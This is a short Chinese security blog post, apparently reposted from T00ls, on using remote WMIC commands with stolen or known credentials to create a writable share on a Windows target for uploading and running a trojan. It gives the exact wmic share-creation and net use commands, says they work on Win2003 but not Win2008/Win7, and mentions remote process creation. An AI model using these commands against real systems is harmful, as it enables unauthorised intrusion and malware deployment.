内网渗透时候,上传木马经常没有默认共享,不可写入的共享文件夹。后面初步接触wmic,认识了wmic远程强大的功能,于是想到了远程主机给主机建立可写入的共享,然后上传木马上去执行目标主机win2008
使用share别名
wmic share call create /?
查看一下参数
命令如下:
wmic /node:ip /user:user /password:password share call create "","共享文件","","Cpan","","C:","0"
但是
net use z: \ipCpan "pass" /user:user
上去没有写入权限
后面想到了,type参数我给的值为0,应该是这里出了问题,导致权限不够
wmic share list full
一下,
默认共享type=-2147483648,windows默认共享是具备写入权限的,于是我们命令就写成
wmic /node:ip /user:user /password:password share call create "","共享文件","","Cpan","","C:","-2147483648"
也是不行。
总结:win2008,win7远程wmic共享文件夹都不具备写入权限,但是在win2003type值为0都具有写入权限,此方法适合win2003吧,当然,如果你只想查看目标主机的文件,这条命令也适合。其他的wmic process call create "command" 也是一条经常应用的命令。
本文始发于微信公众号(T00ls):【奇技淫巧】wmic 远程建立可写入共享,一种思路及实践
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论